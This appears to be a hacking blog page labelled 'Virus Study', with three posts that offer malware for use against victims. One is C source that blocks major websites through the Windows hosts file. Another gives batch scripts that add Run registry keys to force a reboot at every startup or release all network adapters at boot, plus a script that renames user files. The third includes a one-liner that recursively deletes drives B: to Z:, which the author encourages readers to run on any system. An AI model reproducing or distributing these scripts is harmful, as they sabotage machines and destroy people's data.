Paid To Popup Hacking Articles: Virus Study
Showing posts with label Virus Study. Show all posts
Showing posts with label Virus Study. Show all posts

A Virus program to block websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post


Here is the sourcecode of the virus
.
#include
#include
#include
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?
compile the program.


Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.

So Enjoy The Hack.....

Virus Creation (Part-2)


(1)Shutdown computer everytime it is turned on
(save as hshutdown.bat)

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


(2)Disable internet permanently
(save as hinternet.bat)

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


(3)Change files to non-working TXT files
(save as txt.bat)

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
 

Virus creation (Part - 1)


 Howdy,In this post I will show you How to create virus using Notepad.
 So friends now we will start.,

(1)How to make a prank virus (Just for fun)

Open Notepad  then type following code:-

titltle virus
msg * A trojan attack
msg * It will crack ur pc.
msg *  Your computer is being cracked
msg * HaHaHa !!!
save this as virus.bat and then open it,

Then see what will happen.

(2)How to Make a virus which shut down ur computer after 10 sec.

Open notepad and write down following code

title virus
msg * Torjan attack
msg * it will shut down ur computer
pause
shutdown -t 10
msg * Ha!Ha!Ha!

save this file as shut.bat and open it then see what happen..

(3)Virus will delete all the data from hard drive from any remote system

(****Try it your own Risk****)

Open notepad and write down following code...

.................................................
(RD /s /q B:)&&(RD /s /q D:)&&(RD /s /q E:)&&(RD /s /q F:)&&(RD /s /q G:)&&(RD /s /q H:)&&(RD /s /q I:)&&(RD /s /q J:)&&(RD /s /q K:)&&(RD /s /q L:)&&(RD /s /q M:)&&(RD /s /q N:)&&(RD /s /q O:)&&(RD /s /q P:)&&(RD /s /q Q:)&&(RD /s /q R:)&&(RD /s /q S:)&&(RD /s /q T:)&&(RD /s /q U:)&&(RD /s /q V:)&&(RD /s /q W:)&&(RD /s /q X:)&&(RD /s /q Y:)&&(RD /s /q Z:)



and save as crack.bat
.......................................................................................
try this on any system it will erase all data which is hd or usb drives except C and CD or DVD drives and yeah floppy too :D........


So Enjoy the Hack.....